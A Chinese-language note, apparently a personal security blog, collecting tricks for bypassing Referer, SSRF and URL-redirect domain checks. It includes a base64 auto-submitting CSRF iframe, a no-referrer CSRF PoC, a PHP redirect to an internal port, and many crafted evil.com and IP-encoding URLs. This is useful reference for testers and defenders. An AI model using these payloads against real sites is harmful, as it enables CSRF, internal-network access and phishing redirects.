关于绕过域名（ip）校验的一些小知识

这篇文章最开始只是想写一个关于绕过referer的方法，写着写着发现和ssrf以及url跳转的一些手法类似，于是把这两种也加上了

对referer做校验一般是对csrf进行防范的手段之一，但是很多时候不经意间还会增加其他攻击的难度，如xss，jsonp劫持等等。

这里对referer的绕过做一个小的总结：
目标网站是：www.domain.com

攻击者的域名是:evil.com

1.使用子域名的方式绕过，如下：

http://domain.evil.com/

2.注册一个类似的域名，如下：
http://www.evildomain.com/

3.将域名以参数的形式接下url后面(#也可以)

http://www.evil.com/?http://www.domain.com

4.利用空referer

　　1）利用ftp://,http://,https://,file://,javascript:,data:等伪协议进行跳转，如下

　　<html>
        <body>
       <iframe src="data:text/html;base64,PGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPWh0dHA6Ly9hLmIuY29tL2Q+PGlucHV0IHR5cGU9dGV4dCBuYW1lPSdpZCcgdmFsdWU9JzEyMycvPjwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0Pg==">
        </body>
   　  </html>

　　2）添加<meta name="referrer" content="never">，poc如下

　　<html>

　　<meta name="referrer" content="never">

　　<body>

　　　　<script>history.pushState('', '', '/')</script>

　　　　<form action="http://127.0.0.1/test.php">

　　　　<input type="submit" value="Submit request" />

　　</form>

　　<script>       document.forms[0].submit();     </script>

　　</body>

　　</html>

　　

　　3）https跳到http时也没有referer

5.如果受信任的网站中可以添加链接，可以在受信任的网站上添加链接，但是不支持post的csrf

6.利用url跳转

7.结合受信任的网站的xss漏洞进行利用

顺便把ssrf绕过的几种方法在这里补充下：

1.[::]   (直接在浏览器中输出是不行的，貌似和服务器端代码实现有关)          http://0/ 攻击本地

2.利用@    http://example.com@192.168.1.1

3.特殊域名    http://192.168.1.1.xip.io/

4.DNS重绑定  利用ceye平台

5.利用Enclosed alphanumerics

6.   127。0。0。1

7.利用进制   八进制钱加0  十六进制钱加0x        需要补位1-》01 然后再进制转换

　　1.可以是十六进制，八进制等。 115.239.210.26  >>>  16373751032 首先把这四段数字给分别转成16进制，结果：73 ef d2 1a 然后把 73efd21a 这十六进制一起转换成8进制 记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样)，十六进制加0x

　　2.http://127.0.0.1  -》  http://0177.0.0.1/

8.利用协议   dict://     sftp://   ldap://   goapher://

-----------------------------------------------------2019.3.11---------------------------------------------------------------

今天在FB上看到一种绕过ssrf控制的方法（原文在https://www.freebuf.com/vuls/196619.html）

当服务器端仅是对内网ip做正则时(这些场景是我意淫的)，可以控制url让服务器请求我们自己的网站下的某个网页，在网页下进行重定向(这也是为什么ssrf的方法措施中有一个项是禁止30X跳转)

<?php header("location: http://[::]:22/"); ?>

-----------------2020.2.26-----------------
补充一个关于绕过ssrf的新姿势 https://xz.aliyun.com/t/7256
这篇文章中还可以找到ssrf中对应 dns重定向以及302跳转 的防范手段

URL跳转绕过：
1.利用问号？

http://www.aaa.com/acb?Url=http://evil.com?login.aaa.com

2.利用井号#

http://www.aaa.com/acb?Url=http://evil.com#login.aaa.com

3.利用@

http://www.aaa.com/acb?Url=http://aaa.com@www.evil.com

3.利用正反斜杠

http://www.aaa.com/acb?Url=http://evil.com/login.aaa.com

http://www.aaa.com/acb?Url=http://evil.com\\login.aaa.com

http://www.aaa.com/acb?Url=http://evil.com\login.aaa.com

http://www.aaa.com/acb?Url=http://evil.com\.login.aaa.com

4.百名单缺陷(白名单是aaa.com)

www.evilaaa.com       www.aaa.com.evil.com

5.多重跳转（没试过，感觉应该不行吧）

http://www.aaa.com/acb?Url=http://login.aaa.com/acb?url=http://login.test.com

6.利用http://www.aaa.com.220.181.57.217.xip.io   实际上访问的是IP地址

------------------------------------------------------------2019.5.17------------------------

再补充一个：Java中经常会通过java.net.URL.gethost()来获取url的域名，但是方法获取域名时在以往的jdk版本中是存在问题的

比如说 url 是  “https://www.rebeyond.net\@www.huawei.com/poc.htm”  通过该方法获取的host将是www.rebeyond.net\@www.huawei.com   而浏览器访问时是www.rebeyond.net

https://www.rebeyond.net\.www.huawei.com/poc.htm    将@改为 . 也可以

还有一个类似的情况

https://www。evil。com%23%5cwww.baidu.com/

http://www.evil.com#@www.baidu.com/

--------------------------------2019.12.4-----------------

再补充一个绕过domain白名单的（2019黑帽大会，利用unicode类字母符号 https://www.fuhaoku.net/block/Letterlike_Symbols）

https://office.live.com/start/word.aspx?h4b=dropbox&eurl=htt ps://evil.ca/c.dropbox.com/wopi_edit/document1.docx&furl=htt ps://www.dropbox.com/wopi_download/document1.docx&c4b =1